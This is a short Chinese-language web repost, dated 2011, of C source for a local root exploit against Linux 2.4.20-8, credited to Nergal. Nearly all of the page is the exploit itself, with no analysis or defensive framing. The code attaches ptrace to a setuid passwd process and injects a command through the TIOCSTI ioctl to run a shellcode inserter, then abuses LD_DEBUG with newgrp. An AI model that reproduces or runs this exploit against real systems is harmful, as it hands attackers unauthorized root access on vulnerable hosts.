Linux l 2.4.20-8 # 溢出

时间：2011-05-02 来源：小宝哥哥

代码如下：

/* by Nergal */
#include <stdio.h>
#include <sys/ptrace.h>
#include <fcntl.h>
#include <sys/ioctl.h>
void ex_passwd(int fd)
{
char z;
if (read(fd, &z, 1) <= 0) {
perror("read:");
exit(1);
}
execl("/usr/bin/passwd", "passwd", 0);
perror("execl");
exit(1);
}
void insert(int pid)
{
char buf[100];
char *ptr = buf;
sprintf(buf, "exec ./insert_shellcode %i\n", pid);
while (*ptr && !ioctl(0, TIOCSTI, ptr++));
}

main(int argc, char **argv)
{
int res, fifo;
int status;
int pid, n;
int pipa[2];
char buf[1024];
pipe(pipa);
switch (pid = fork()) {
case -1:
  perror("fork");
  exit(1);
case 0:
  close(pipa[1]);
  ex_passwd(pipa[0]);
default:;
}
res = ptrace(PTRACE_ATTACH, pid, 0, 0);
if (res) {
  perror("attach");
  exit(1);
}
res = waitpid(-1, &status, 0);
if (res == -1) {
  perror("waitpid");
  exit(1);
}
res = ptrace(PTRACE_CONT, pid, 0, 0);
if (res) {
  perror("cont");
  exit(1);
}
fprintf(stderr, "attached\n");
switch (fork()) {
case -1:
  perror("fork");
  exit(1);
case 0:
  close(pipa[1]);
  sleep(1);
  insert(pid);
  do {
   n = read(pipa[0], buf, sizeof(buf));
  } while (n > 0);
  if (n < 0)
   perror("read");
  exit(0);
default:;
}
close(pipa[0]); dup2(pipa[1], 2);
close(pipa[1]);
/* Decrystallizing reason */
setenv("LD_DEBUG", "libs", 1);
/* With strength I burn */
execl("/usr/bin/newgrp", "newgrp", 0);

相关阅读更多 +